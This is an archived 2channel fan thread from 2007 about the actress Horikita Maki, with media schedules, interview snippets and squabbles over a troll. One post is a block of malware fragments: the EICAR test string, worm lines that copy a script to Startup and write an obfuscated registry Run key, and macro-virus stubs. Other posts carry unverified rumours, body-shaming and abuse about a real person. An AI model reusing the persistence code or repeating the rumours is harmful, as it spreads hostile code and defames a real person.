2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【私。恋した】堀北真希 その58【アルババ】

1 :名無しさん@お腹いっぱい。:2007/02/21(水) 02:31:23 ID:Ly4814cO0
前スレ【【レイトン教授】堀北真希 その57【アルババ】
http://tv9.2ch.net/test/read.cgi/actress/1170016729/
公式サイト ほりきたコレクション
http://www.horikita-collection.com/
3/19(月)〜22(木) TOKYO FM「GIRLS LOCKS!」
http://www.tfm.co.jp/lock/girls/index.html
NHK エル・ポポラッチがゆく!!Season3
http://www.nhk.or.jp/popo/index.html
3/1(木) 第2回 小学館 12歳の文学賞記者発表会
http://netkun.com/12saibungaku/
3/7(水) ビジュアルBOOK『Cinematic(シネマティック)』定価2415円
http://www.pia.co.jp/piashop/horikita_info/
3/24(土) 映画『アルゼンチンババア』(松竹&キネティック共同配給)
http://www.arubaba.com/
http://www.kinetique.co.jp/
6/9(土) 映画「恋する日曜日 〜私。恋した」(廣木隆一監督、新宿トーア公開予定)
http://www.cinematopics.com/cinema/c_report/index3.php?number=2528
9月公開 映画「東京少年」
11月公開 映画「ALWAYS 続・三丁目の夕日」
http://www.always3.jp/
自分で自分を褒める人は匿名の掲示板しか話し相手のいない人です。可哀想なので放置してください。
悪質な削除要請や自己中心的な発言はひかえましょう。
http://info.2ch.net/before.html
「堀北」で過去スレを検索
http://makimo.to/2ch/search.html
堀北スレでは過去に盗撮を呼びかける書きこみをしたり、著作権や肖像権を侵害する書き込みをした荒らしが出ました。
スレ住人や堀北さんや事務所に迷惑になる書き込みはご遠慮ください。自宅、学校、仕事場に押しかけるストーキング行為は犯罪ですのでやめましょう。
著作権や肖像権を侵害する書きこみも犯罪ですのでやめてください。アンチはアンチスレで。関連スレなど>>2-5

2 :名無しさん@お腹いっぱい。:2007/02/21(水) 02:32:49 ID:GPvOEnPTO
2

3 :名無しさん@お腹いっぱい。:2007/02/21(水) 02:34:12 ID:M/wHwgSP0
関連スレ
【盗撮するな】ホリンピアは堀北真希のストーカー6
http://tmp6.2ch.net/test/read.cgi/tubo/1167325842/
【よしもとばなな】アルゼンチンババア【役所広司】
http://tv10.2ch.net/test/read.cgi/cinema/1167280971/
ALWAYS三丁目の夕日 35番地
http://tv10.2ch.net/test/read.cgi/cinema/1171647635/
堀北真希の男性関係/亀梨/バスケ部の彼/イケメンモデル
http://human6.2ch.net/test/read.cgi/uwasa/1148404349/
堀北真希 パート3
http://tv9.2ch.net/test/read.cgi/idol/1168781094/
【堀北真希】ロッテ エアーズ【チョコレート】
http://tv8.2ch.net/test/read.cgi/cm/1107440487/
孤独だけど堀北真希ちゃんだけが支え
http://life8.2ch.net/test/read.cgi/alone/1165087387/
☆●堀北真希のファッション●☆
http://life8.2ch.net/test/read.cgi/fashion/1162987435/
最近堀北真希本性出しつつあるな。(アンチスレ)
http://tv9.2ch.net/test/read.cgi/actress/1160083223/

4 :名無しさん@お腹いっぱい。:2007/02/21(水) 02:37:20 ID:Ly4814cO0
東映チャンネル「ケータイ刑事ザムービー バベルの塔の秘密〜銭形姉妹への挑戦状」 「ケータイ刑事 銭形舞」
http://www.toeich.jp/CS/special.php?sp_id=160
日本映画チャンネル「逆境ナイン」
http://www.nihon-eiga.com/prog/108055_000.html
「キネマ横丁」「アルゼンチンババア」特番
http://streaming.yahoo.co.jp/p/t/00073/v01034/
GyaO、松山ケンイチ、堀北真希出演の映画「ウィニング・パス」を配信
http://bb.watch.impress.co.jp/cda/news/17168.html
3/19(月)〜22(木) TOKYO FM 22:15〜22:25「GIRLS LOCKS!」
http://www.tfm.co.jp/lock/girls/index.html
BUMP OF CHICKEN 「涙のふるさと」PV&CM出演
http://www.bumpofchicken.com/
フジフィルムCM「PHOTO IS 堀北真希/私」編「PHOTO IS 堀北真希/空」編
http://fujifilm.jp/cm/index.html
フジカラーデジカメプリント」2006年秋 CM「プリントし忘れ・中国」篇
http://www.fujifilm.co.jp/corporate/news/article/ffnr0053.html
ANA CM「LIVE/中国/ANA」
http://www.ana.co.jp/anafan/cm/
http://www.ana.co.jp/ana-info/event/ana_chi/index.html
ロッテCM エアーズ「おまじない」篇
http://www.airsbear.com/
http://www.lotte.co.jp/entertainment/tvcm/0609airs/index.html
サントリーCM なっちゃんソーダ「問いかける少女」篇
http://www.suntory.co.jp/softdrink/natchan/index.html

5 :名無しさん@お腹いっぱい。:2007/02/21(水) 02:38:23 ID:Ly4814cO0
1/27(土) スクール オブ ロック! デイズ 定価1300円
http://www.tfm.co.jp/lock/days/
1/27(土) NYLON JAPAN 定価580円「最旬ガール10人が教えるダンスパワーソング!堀北真希ほか」
1/31(水) H (エイチ) 2月号 「映画アルゼンチンババア紹介」
http://www.rock-net.jp/h/index.html
2/3(土) 日経エンタテインメント ! 2007年 3月号 定価500円「特集 U-19女優図鑑 ナンバーワンを目指すセーラームーン世代 堀北真希」
http://ent.nikkeibp.co.jp/ent/index.html
2/7(水) 堀北真希 写真集 SWEET MAGIC 定価1200円+ 読書端末ワーズギア 定価41790円
http://www.saidoku.com/
2/9(金) BOMB (ボム) 3月号 定価590円「カラーグラビア&インタビュー」
http://www.bomb.tv/
2/10(土) CM NOW (シーエム・ナウ) 3月号 定価830円 「表紙・堀北真希、上戸、長澤」
http://www.genkosha.co.jp/cm/index.html
2/10(土) Invitation (インビテーション) 3月号 定価680円「冬から春への女優たち・堀北真希」
http://entertainment.jp.msn.com/invitation/special_top.htm
2/14(水) TVぴあ 定価280円「堀北真希・連載 in アルゼンチンババア 第1回」「ほのぼのとした映画です」
2/19(月) ピクトアップ #45 定価600円「アルゼンチンババア・堀北真希」
2/23(金) Kindai (キンダイ) 4月号 定価580円
2/23(金) UP to boy (アップ トゥ ボーイ) 4月号 定価980円「堀北真希のチャレンジスピリッツ」
http://www.wani.co.jp/uptoboy/index.asp
2/23(金) Myojo (ミョウジョウ) 4月号 定価580円
2/28(水) TVぴあ 定価280円「堀北真希・連載 in アルゼンチンババア 第2回」
3/4(日) ダ・ヴィンチ 4月号 定価450円「スタジオインタビュー・堀北真希」
3/7(水) ビジュアルBOOK『Cinematic(シネマティック)』定価2415円
http://www.pia.co.jp/piashop/horikita_info/
3/14(水) TVぴあ 定価280円「堀北真希・連載 in アルゼンチンババア 第3回」
3/16(金) 堀北真希 in アルゼンチンババア 〜みつこの夏〜ナビゲートDVD 定価2250円
3/20(火) デジタルフォトテクニック#014 定価1100円「堀北真希の思い出アルバム12」
3/28(水) TVぴあ 定価280円「堀北真希・連載 in アルゼンチンババア 最終回」

6 :名無しさん@お腹いっぱい。:2007/02/21(水) 02:59:53 ID:d+Pzdtsq0
>>1
映画「恋する日曜日 〜私。恋した」公式サイト
http://www.bs-i.co.jp/jbreak/koisuru/watakoi/

堀北真希:「最初から細くてうらやましい」 映画「恋する日曜日 私。恋した」会見
http://www.mainichi-msn.co.jp/entertainment/geinou/200702/graph/20_2/

7 :海舟問屋:2007/02/21(水) 03:11:03 ID:7V0YSL3GO
ウォッ!
新スレ、やっほー!

パウダースノーだ。滑りやすぅ〜



8 :名無しさん@お腹いっぱい。:2007/02/21(水) 06:20:00 ID:gMxKK7f00
こいつブスだよね

9 :名無しさん@お腹いっぱい。:2007/02/21(水) 14:23:27 ID:StWj3OZ40
>>5
TVぴあ
「さっきそこで牛が水を飲んでたんですよ」(アルゼンチンババア撮影現場で)

ピクトアップ
Q「ストレスがたまったときの解消法は?」
A「掃除をします。夜中に掃除をするのは近所の人に迷惑だろうけど。部屋の家具を動かして模様替えします。
前は買い物をしてたんだけど、友達から『浪費でストレスを解消するのは止めなさい』って言われて(笑)」

Q「納得のいかない演技でOKが出た場合『もう一度』って言いますか?」
A「言わない。監督のOKを信じます」

10 :名無しさん@お腹いっぱい。:2007/02/21(水) 16:08:23 ID:kXoiIFlE0
>>1


11 :名無しさん@お腹いっぱい。:2007/02/21(水) 17:36:06 ID:FmQlNIWo0
>>5
今度の堀北真希のチャレンジスピリッツはアルゼンチンタンゴに挑戦。

堀北真希、主演映画の完成披露会見に出席
http://www.sanspo.com/geino/top/gt200702/gt2007022115.html
堀北真希が、極細ボディの窪塚俊介にジェラシー!
http://cinematoday.jp/page/N0010010
堀北真希「初恋は幼稚園で」
http://chuspo.chunichi.co.jp/00/hou/20070221/spon____hou_____010.shtml

12 :名無しさん@お腹いっぱい。:2007/02/21(水) 17:58:45 ID:B6YEaKja0
レイトンの時といい、今回の恋日の会見でもスタイリストのセンスが悪い

13 :名無しさん@お腹いっぱい。:2007/02/21(水) 21:12:24 ID:3cakSNh+0
閉鎖したブログの2004年11月の握手会レポによると真希ちゃんの好きな『生徒諸君!』って教師編らしい

>福家は 850 番での参加だったので開始から1時間半後にご対面(^^; 真希ちゃんの好きなマンガ、
>ナッキーが先生になってる新しい『生徒諸君!』を「絶対に読むように」という命令を承ってきました(笑) 
>ラクーアから福家までつき合ってくれた方からオススメされた『ガンダムシード』と一緒にチェックしたいと思います(^^ゞ

14 :名無しさん@お腹いっぱい。:2007/02/21(水) 21:24:29 ID:k3P/XJIn0
そんなに前から好きな漫画を「生徒諸君」って言ってたのか
他の漫画の名前がその後も全然出てこないのは
あんまり漫画読まないからかな
まあ出演するかどうかに関係なく
ドラマ「生徒諸君」にはかなり関心もってそうだな

15 :名無しさん@お腹いっぱい。:2007/02/21(水) 22:27:05 ID:Z6wXaK320
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


16 :名無しさん@お腹いっぱい。:2007/02/21(水) 23:24:19 ID:uavuRtCjO
2ゲト

17 :名無しさん@お腹いっぱい。:2007/02/22(木) 00:14:01 ID:rTI/+7YO0
>>1
乙まきまき

18 :名無しさん@お腹いっぱい。:2007/02/22(木) 00:27:50 ID:0T98AxXc0
>>12
まきんぽB80は頻繁にあの色の服着てる印象がある

最近なんか皇室の人っぽくなってきた。

19 :名無しさん@お腹いっぱい。:2007/02/22(木) 03:01:15 ID:v+aNK8Rs0
>>1
生徒諸君!
http://seitoshokun.asahi.co.jp/
http://www.tv-asahi.co.jp/seitoshokun/

20 :名無しさん@お腹いっぱい。:2007/02/22(木) 06:39:46 ID:cztjj+cG0
堀北真希、先輩内山理名と連ドラ初共演…テレ朝4月スタート
http://hochi.yomiuri.co.jp/entertainment/news/20070222-OHT1T00065.htm


21 :名無しさん@お腹いっぱい。:2007/02/22(木) 07:58:11 ID:3i5IRBTR0
真希ちゃんの紺ハイソ

22 :名無しさん@お腹いっぱい。:2007/02/22(木) 09:57:29 ID:DLO98sEE0
今度は3浪でクールな女子校生役か?

女子高生刑事、田舎娘、いじめられっ子、熱くて悪いか(これ伝説)、3浪のツンデレ



23 :ホリン☆ぴあ。 ◆HORIMPTVgE :2007/02/22(木) 11:11:07 ID:hQfv8B7k0
おはよう。芸スポにもスレ立ってる。
【テレビ】堀北真希が事務所の先輩・内山理名と初共演…テレ朝「生徒諸君!」で中学生役として出演
http://news21.2ch.net/test/read.cgi/mnewsplus/1172093544/

24 :名無しさん@お腹いっぱい。:2007/02/22(木) 11:49:38 ID:3EKS/cOV0
事務所の先輩後輩が連ドラ初共演で火花 
内山理名&堀北真希
http://chuspo.chunichi.co.jp/00/hou/20070222/spon____hou_____009.shtml
堀北は、尚子が受け持つクラスの生徒役。病気で入院していたため、クラスメートより3つ年上で、
授業には耳を貸さず、ひとり大検の勉強に励んでいるという役どころだ。
内山と堀北は連ドラでは初顔合わせ。内山は「真希ちゃんの演技は、大人がどきっとしてしまうところがある。
“イマドキ”ではないところも魅力」と分析し、「しんの強い役柄同士、演技ではとことん闘いたい」とバトル覚悟の熱演を約束。
先輩の内山から仕事に対する姿勢を学んできたという堀北は、「同じ現場に立つことになり、
私も恥ずかしくないよう、真剣に取り組んでいきたい」と、こちらも真っ向勝負を挑む。

25 :名無しさん@お腹いっぱい。:2007/02/22(木) 13:25:38 ID:7Y7G6LCa0
>>24
うちら今日は登校日だったよ〜すごいタイミング笑
お母さんが元々生徒諸君のファンなんだよ

26 :名無しさん@お腹いっぱい。:2007/02/22(木) 14:05:53 ID:6KU6Fluo0
今日はガールズロックスで出演発表するのかな?

27 :名無しさん@お腹いっぱい。:2007/02/22(木) 16:34:35 ID:ZpM2kMP10
>>23ホリンさんの言ってる『サターン』って何ですか?教えてケロ

646 名前: ホリン☆ぴあ。 ◆HORIMPTVgE 2007/01/22(月) 21:35:29 ID:???
ずっとひきずってたが。私が気に喰わないのは。中学の元彼の件。
サターンやフラッシュの内容からいた可能性は高いでしょ?
男性アイドル誌のインタビューやグータンでも恋愛話を隠したり
話をはぐらかしてる。他のアイドルはキス話とかでも
雑誌でぶっちゃけてる人も多い。芸人なんかは初体験まで語るけど。
オープンな方が絶対好印象。ガッキーだって7月に出たボム!で
付き合ってると言えるLVか・・と断りいれたうえで彼氏の存在
カミングアウトしたのにさ。

953 名前: ホリン☆ぴあ。 ◆HORIMPTVgE 2007/02/17(土) 02:21:50 ID:???
長文でのアンチ発言だけど。
堀北さんのこと書いてるブログ・2ちゃん過去ログ少し見てみた。>>952
握手会での基本的な態度は、他の人と比較して反応なし、笑わないってのが感想。
ところが、番宣で山Pや塚本くんとか共演してる時にはウキウキしてるよね。
誰だって肝ヲタより池面の有名人がいいけど、そういうのを表に出すのは
プロ失格。どんなアイドル誰だって、ファンを獲得したいからヲタの前では
愛想を振りまくんです。以前はB型で不器用だからって擁護してたけど。
首をかしげる。濃いヲタでない一般人から見れば、本人が否定するがぶりっ子にしか見えない。
それに、フラッシュ増刊やサターンの同級生?の証言から元カレが
いるのが濃厚に見えるが、男性アイドル誌のインタビューやグータンでは
私は恋愛に興味ありません知りません的な態度を取ってる。
あの子は嘘は許せないらしいが、だったらあなたはなんなの?って言いたくなる。
良い作品に出て、演技が上手くても頭にノイズが走ってしまう。
生理的・本能的にうけつけないから許すとか許さないじゃない。
去年の6月からずっと引きずってる。悲しいね。

991 名前: ホリン☆ぴあ。 ◆HORIMPTVgE 2007/02/18(日) 01:23:46 ID:???
フラッシュEXとガオー。おまけにサーカス・ジュノン×2のインタビュー。
自分なりにプラベを色々イメージした。
中学の元彼がいたはいいんだけど、中学生の分際で付き合ったリ別れたり
人の心を持て遊ぶような昼メロみたいな不真面目な恋愛をしたことにゲンナリ。
フラッシュEXの文集でも「なんだこいつ・・」とか性格のキツサが
良く出てた。サターンのがおーの話は具体的過ぎた。元彼に恨み言を
言われるような人は信用できない。例に出すが後藤真希ちゃんは
交際多く重ねてるだろうし、処女にはあまり見えない。でも別れた男に恨まれる
ようなことはしないと思う。サバサバしてて明るいし。
がおーの件があってから、自分は毒のある発言するようになり、堀北さん
のすべてが嘘というか歪んで見えるようになった。本当のことはわからないが
がおーの話はあまりにも具体的過ぎたよ。自分が知らない内にプラベを
暴露するような友達と付き合ってることも・・類は友を呼ぶって言うし・・
プリンちゃんの言ってることも。それからずっと尾を引いている。
まぁ噂関係なく堀北さんは人をより好みする歪んだ八方美人だと思う。
ラジオだってオレンジレンジとかゲストに来たらはしゃいでるし。
でも自分が興味ないゲストならトーンが低い。コトノハでどんな素晴らしい
言葉書いてても、素晴らしい演技してても自分の心はまったくうたない。

28 :名無しさん@お腹いっぱい。:2007/02/22(木) 16:42:46 ID:vEh0wN5E0
>ジュノン×2のインタビュー

女の読むヲタ雑誌までチェックしてるのかw
たぶん本人は男に読まれること想定してないぞ

29 :ホリン☆ぴあ。 ◆HORIMPTVgE :2007/02/22(木) 18:24:20 ID:hQfv8B7k0
自分で探せば?>>27
そのコピペはレイトンの披露会の動画を見た私が、
超清純派の堀北さんが、過去に性的なスキャンダルを起こした大泉洋と、
必要以上に仲良くしてると感じて、逆切れして邪推して書いた文章。
まともな精神状態ではなかったんで。ちなみにジュノンのインタビュー
は、なんかみんな全般的に大胆というか、ぶっちゃけてるというか。
読者のSEX体験談特集とかある雑誌なんで。
ちなみに彼氏がいました、とかまで書いてない。


30 :ホリン☆ぴあ。 ◆HORIMPTVgE :2007/02/22(木) 23:09:49 ID:hQfv8B7k0
ラジオの選曲は“涙のふるさと“だったね。
握手会の時、会いに来たよ〜♪会いに来たよ〜♪
って堀北さんに挨拶すれば、大ウケじゃないの〜?・・間違いない。
(私はやらないよ。。)

31 :名無しさん@お腹いっぱい。:2007/02/22(木) 23:28:06 ID:ycha50pQ0
今日もカワイイ声
ありがと!

32 :名無しさん@お腹いっぱい。:2007/02/23(金) 00:06:51 ID:PIKYucUP0
>>29
うそつけ。お前がサターンに書き込まれた彼氏の書き込みをしつこく持ち出すようになったのは去年の7月からだろ。
ほとんど誰も見てない掲示板の書き込みを、誇張して2ちゃんに晒し続けて卑怯なアンチ活動し続けてるくせに。


33 :名無しさん@お腹いっぱい。:2007/02/23(金) 00:39:23 ID:aehZc6jn0
なんでこっちに来るんだよ糞コテ
芸能板に引きこもっとけハゲ

34 :名無しさん@お腹いっぱい。:2007/02/23(金) 00:48:53 ID:LIIPhHJH0
>12 こういうの書く奴ってたいがい仕事のない業界人だろな・・

35 :名無しさん@お腹いっぱい。:2007/02/23(金) 00:58:45 ID:MdnaJNjtO
この人すごい整形してるよねぇ!!
まだ若いのに顔面大工事なんて…親が可哀相!

36 :ホリン☆ぴあ。 ◆HORIMPTVgE :2007/02/23(金) 01:20:09 ID:tSpW40o90
個人的には、もっと普通の服着てほしいと思う。>>34
フッションバイヤーのウチのダチがさ。
センス微妙・・って良く言われてしまってるよ。
今まではスレ住人が、私もだけど服装、ファッションのことは全然気にして
なかったネ。これは良い傾向だよ。

例えを出すとエリカちゃんもファンがスタイリストのセンスを疑ってるし。
あっちは奇抜。堀北さんはなんだろうなぁ。お金を持ってる外国人
の叔母さんって感じに見えることが多い。若さがないんだね。
後はお人形さんみたいな。だからアカネのゴスロリが似合う訳だが、これだと
残念ながらヲタのハートは掴んでも、万人受けはしない。ここも課題だね。

37 :名無しさん@お腹いっぱい。:2007/02/23(金) 01:21:53 ID:PIKYucUP0
>>36
荒らしのお前がキモイ長文連投するから誰も書き込まないんだろ。
最近のアンチもお前がわざわざドラマ板から呼び寄せたやつらだしな。

38 :名無しさん@お腹いっぱい。:2007/02/23(金) 01:23:57 ID:ZpNIW9oG0
短いスカートやスタイルがまるわかりになるファッションをしないのは
スタイリストのせいではなくって
堀北自身の問題でしょ

39 :名無しさん@お腹いっぱい。:2007/02/23(金) 01:32:48 ID:V4An2tIz0
もこみち>>>内山   相武=堀北だから
生徒諸君のレガッタ以上の大コケは間違いないな。

40 :名無しさん@お腹いっぱい。:2007/02/23(金) 01:35:42 ID:xe57R8zv0
クロサギがもう一年前かー。

41 :ホリン☆ぴあ。 ◆HORIMPTVgE :2007/02/23(金) 01:38:58 ID:tSpW40o90
良く言われるけど、堀北さんの足って太いかなぁ?>>38
ケータイ刑事舞台挨拶。
http://www.mainichi-msn.co.jp/entertainment/geinou/graph/20060204/1.html

私は前5列くらいで見てたけど、あまり気にならなかったな。

ドラマはまず脚本、次に演出、その次に演じる役者ですので。>>39

42 :名無しさん@お腹いっぱい。:2007/02/23(金) 01:45:51 ID:Pne6yw9R0
太くないだろ。
近くで見てみろよww

43 :名無しさん@お腹いっぱい。:2007/02/23(金) 01:51:14 ID:ZgARlY2/0
>>41
また下半身デブっていつもの捏造かよ。何度も嘘ついてるが、週刊文春にそんなこと書いてなかっただろ。
荒らしの自分の居場所を確保する為にわざとアンチと馴れ合うんだよな。

アンチ堀北真希その1
http://search.mimizun.com:82/perl/dattohtml.pl?http://mimizun.com:81/log/2ch/geino/tv7.2ch.net/geino/kako/1133/11336/1133602549.dat
お前の言う、根暗、いじめやってる、デブ、男関係の噂も全部お前の捏造じゃないか。
お前が荒らしたから芸能板の本スレの住人がいなくなったんだろ。
アンチはアンチスレにいけよ>>1他の女優のアンチスレは賑わってるけど
堀北アンチスレはまったくレスついてないだろ。

【ガムクチャ】アンチ沢尻エリカ3【ドレス飽きたんで〜】
http://tv9.2ch.net/test/read.cgi/actress/1168762247/
長澤まさみのアンチスレPart2
http://tv9.2ch.net/test/read.cgi/actress/1163508119/
上戸が女優とか笑わせるなよw
http://tv9.2ch.net/test/read.cgi/actress/1125551833/
綾瀬はるかがキモすぎて目も当てられない件
http://tv9.2ch.net/test/read.cgi/actress/1162798343/
【ヲタ禁止】アンチ上野樹里!!【ゆとり教育】
http://tv9.2ch.net/test/read.cgi/actress/1160890049/
井上真央アンチ 花より男 キッズなんとか
http://tv9.2ch.net/test/read.cgi/actress/1130421403/
【アンチ】宮崎あおい
http://tv9.2ch.net/test/read.cgi/actress/1146087440/
【DEATH NOTE】戸田恵梨香アンチ【降ろせ】
http://tv9.2ch.net/test/read.cgi/actress/1141454989/
【キモブス】アンチ蒼井優【顔面グチャグチャ】
http://tv9.2ch.net/test/read.cgi/actress/1153561762/
【創価】アンチ榮倉奈々【ごり押し】
http://tv9.2ch.net/test/read.cgi/actress/1149718481/

最近堀北真希本性出しつつあるな。
http://tv9.2ch.net/test/read.cgi/actress/1160083223/

44 :名無しさん@お腹いっぱい。:2007/02/23(金) 02:31:08 ID:V4An2tIz0
生徒諸君の平均視聴率予想 5.1%

45 :ホリン☆ぴあ。 ◆HORIMPTVgE :2007/02/23(金) 02:40:44 ID:tSpW40o90
それはない。>>44

堀北さんが少なからず数字持ってるから、コケても大コケはない。
脚本の悪いアカネがレガッタLVまで数字落さなかったのは、
堀北さんの魅力によるとこが大きい。暗いけどなんとなく華のある子だよ。
でもスポンサー料が民放のドラマで一番高い枠なんで、
(日経エンタ見て、月9より高い)打ち切られたと思っている。おやすみzz

46 :名無しさん@お腹いっぱい。:2007/02/23(金) 02:43:08 ID:V4An2tIz0
>>45
アカネは日9最低視聴率だぞw 数字を持ってたらこんな結果にはならんだろ。
堀北は地味だし暗いし演技微妙だから生徒諸君はダメポ。

47 :名無しさん@お腹いっぱい。:2007/02/23(金) 02:46:20 ID:AYIUpPdU0
>>1


48 :名無しさん@お腹いっぱい。:2007/02/23(金) 02:48:40 ID:XW8Bfn6fO
あーあ。ラジオ今日だけ聞き逃しちゃったよ(´・ω・`)


誰か内容教えてorz

49 :名無しさん@お腹いっぱい。:2007/02/23(金) 02:50:21 ID:PIKYucUP0
>>45
お前も本当にしつこいね、お前がアンチをかまうから居すわるんだろ。
死ねよ!


50 :名無しさん@お腹いっぱい。:2007/02/23(金) 02:53:06 ID:PIKYucUP0
>>45
>>27に書いてるようなキチガイじみたアンチの捏造長文を
何百回も書き込んでるお前にかばってもらいたいなんて堀北さんも思ってないぞ。


51 :名無しさん@お腹いっぱい。:2007/02/23(金) 02:59:08 ID:Y5icsmKQ0
>>45
真希ちゃん自身が「暗くない明るい」って言ってるのにしつこいなあ
あんたはアカネ見てないし放送中叩きまくってたくせに

【昭和生まれ】堀北真希 36【まきまき】
http://tv9.2ch.net/test/read.cgi/geino/1168794911/
44 名前:ホリン☆ぴあ。 ◆HORIMPTVgE [sage] 投稿日:2007/02/13(火) 00:48:17 ID:jOI+9B5V0
アカネをまだ一度も見てないし、番宣もざっとしか見てない。
最近公開した映画は映画館に足を運ぶから見てるけど、電車男すらも私は
後半は見てないし。ケータイ刑事も3話までしか見てない。
最近の雑誌は立ち読みで済ますことが多い。


52 :名無しさん@お腹いっぱい。:2007/02/23(金) 03:00:05 ID:Y5icsmKQ0
まきまきがセーラームーンごっこでセーラーマーズやってって言ってたけど
宮崎あおいもセーラームーンが好きだったんだってさ。

小さい頃、欠かさず見ていたテレビ番組はありますか?

欠かさずではないけど、セーラームーンは好きでした。
ピカピカ光るおもちゃ持ってたし、タキシード仮面のジャマをするちびうさにイライラしてた(笑)

53 :名無しさん@お腹いっぱい。:2007/02/23(金) 03:33:21 ID:4cjWMigL0
>>45
今回の脚本も相当酷い人らしいよ
原作をなぞるだけならそれ程酷くならないだろうけど
その原作が不人気な上に、堀北を入れるために無理に捻じ曲げてる

ドラマはそういうちょっとした綻びから破綻していくんだよ
今回は脇役だけど、無理なねじ込みが綻びの原因になっているわけだから
こけた時の責任は重大だ
やっぱりこんな奴出すんじゃなかったと言われるのがオチ

54 :名無しさん@お腹いっぱい。:2007/02/23(金) 03:57:29 ID:S5q9yqsI0
原作が不人気だからねじ曲げるんだろ

主役でも2番手でもコケたら
叩かれるなんてすでに大物だな。

55 :名無しさん@お腹いっぱい。:2007/02/23(金) 04:07:10 ID:Pne6yw9R0
>>48
ここの183にあるよ
http://pie.bbspink.com/test/read.cgi/girls/1171456685/l50#tag113

56 :名無しさん@お腹いっぱい。:2007/02/23(金) 04:27:37 ID:lxdnC5kV0

ほら、ホリンピアと協力してスレを妨害してるやつって、ドラマ板で暴れてるガチガチのアンチ荒らしだろ。
テレ朝が内山+堀北で企画立ててるんだから、別に「事務所がねじ込んだ」わけじゃないのにな。

2007年4月期ドラマ予想3
http://ex21.2ch.net/test/read.cgi/tvd/1164196589/878
878 名前:ヾ(o゚ω゚o)ノ゙ ◆ptlTL9dht2 投稿日:2006/12/10(日) 17:32:02 ID:CG6R+AqG
>>817
既出に関してのみの書き込みで申し訳ないですが
自分が落とした物以外で

EX
○金09 今のところ確定
(今のところと書いたのは、本当は今10月クールで教師役R.U生徒役M.H(同事務所)でこれやる予定だったが、
後からそれぞれ6の主演の話来てそっちに流れた。で結局今回数字も良くないし、微妙に10が難色気味との噂聞いたので今のところと書きました。
でも多分やるとは思いますが。)

57 :海舟問屋:2007/02/23(金) 05:12:08 ID:VD7vO2haO
>>48
まず「アルゼンチンババア」の紹介。

クイズに答えると試写会にご招待っていうのを三回ぐらい繰り返してた。

曲は、バンプ・オブ・チキンの「涙のありか(←だったっけ?)」
元気づけられるそうだ。

図書部のカキコを紹介。
映画監督とかの有名人のコメント。


相変わらずの鼻声。
辛そうだった。

俺の「鼻セレブ」をやったのに(笑)

来月は体調が万全な真希ちゃんを聴きたい。

かなり、ウル覚えなので訂正は任せた。



58 :名無しさん@お腹いっぱい。:2007/02/23(金) 05:17:56 ID:VD7vO2haO
↑追記
映画監督はLOTTEのエアーズや「涙のふるさと」を監督した山崎監督のコメント。



59 :名無しさん@お腹いっぱい。:2007/02/23(金) 05:21:26 ID:5PjcBZ14O
ほりんぴあ氏なねえかな

60 :名無しさん@お腹いっぱい。:2007/02/23(金) 06:47:20 ID:XW8Bfn6fO
>>55>>57-58
サンクス!!

61 :名無しさん@お腹いっぱい。:2007/02/23(金) 06:58:38 ID:fePLrAna0
>>21ププン酢

62 :名無しさん@お腹いっぱい。:2007/02/23(金) 09:06:59 ID:lbVW41wp0
学園物がどう出るかだな?
生徒諸君 は。

渡と竹野内でもあの時間帯は8%だからな
10%が合格ラインか?5%切ったらドラマスレがレガッタレガッタと荒れる

63 :名無しさん@お腹いっぱい。:2007/02/23(金) 10:27:51 ID:VD7vO2haO
質問しますが、内山ケンイチ君ってどんな人なの?

週刊少年サンデーの「最強の弟子ケンイチ」のモデルになった人とかいうのは抜きで(笑)



64 :名無しさん@お腹いっぱい。:2007/02/23(金) 14:43:39 ID:VD7vO2haO
真希ちゃん、ナルトの実写版でサクラちゃん演じてほしな。

俺は我愛羅(があら)やるんで(笑)

でもタイプからいうと奈良シカマルか………



65 :名無しさん@お腹いっぱい。:2007/02/23(金) 14:53:02 ID:r2cMIouo0
何が悲しくてあんな安いオンナ演じなきゃならんのだ

66 :名無しさん@お腹いっぱい。:2007/02/23(金) 16:23:06 ID:TUEt/zZ10
アップ トゥ ボーイ「堀北真希のチャレンジスピリッツ」最終回は陶芸。
これまで挑戦したことについて
「次にやる機会がないし、やっても教えてくれる先生がいないので上達しません」

1/27(土) スクール オブ ロック! デイズ 定価1300円
http://www.tfm.co.jp/lock/days/
1/27(土) NYLON JAPAN 定価580円「最旬ガール10人が教えるダンスパワーソング!堀北真希ほか」
1/31(水) H (エイチ) 2月号 「映画アルゼンチンババア紹介」
http://www.rock-net.jp/h/index.html
2/3(土) 日経エンタテインメント ! 2007年 3月号 定価500円「特集 U-19女優図鑑 ナンバーワンを目指すセーラームーン世代 堀北真希」
http://ent.nikkeibp.co.jp/ent/index.html
2/7(水) 堀北真希 写真集 SWEET MAGIC 定価1200円+ 読書端末ワーズギア 定価41790円
http://www.saidoku.com/
2/9(金) BOMB (ボム) 3月号 定価590円「カラーグラビア&インタビュー」
http://www.bomb.tv/
2/10(土) CM NOW (シーエム・ナウ) 3月号 定価830円 「表紙・堀北真希、上戸、長澤」
http://www.genkosha.co.jp/cm/index.html
2/10(土) Invitation (インビテーション) 3月号 定価680円「冬から春への女優たち・堀北真希」
http://entertainment.jp.msn.com/invitation/special_top.htm
2/14(水) TVぴあ 定価280円「堀北真希・連載 in アルゼンチンババア 第1回」「ほのぼのとした映画です」
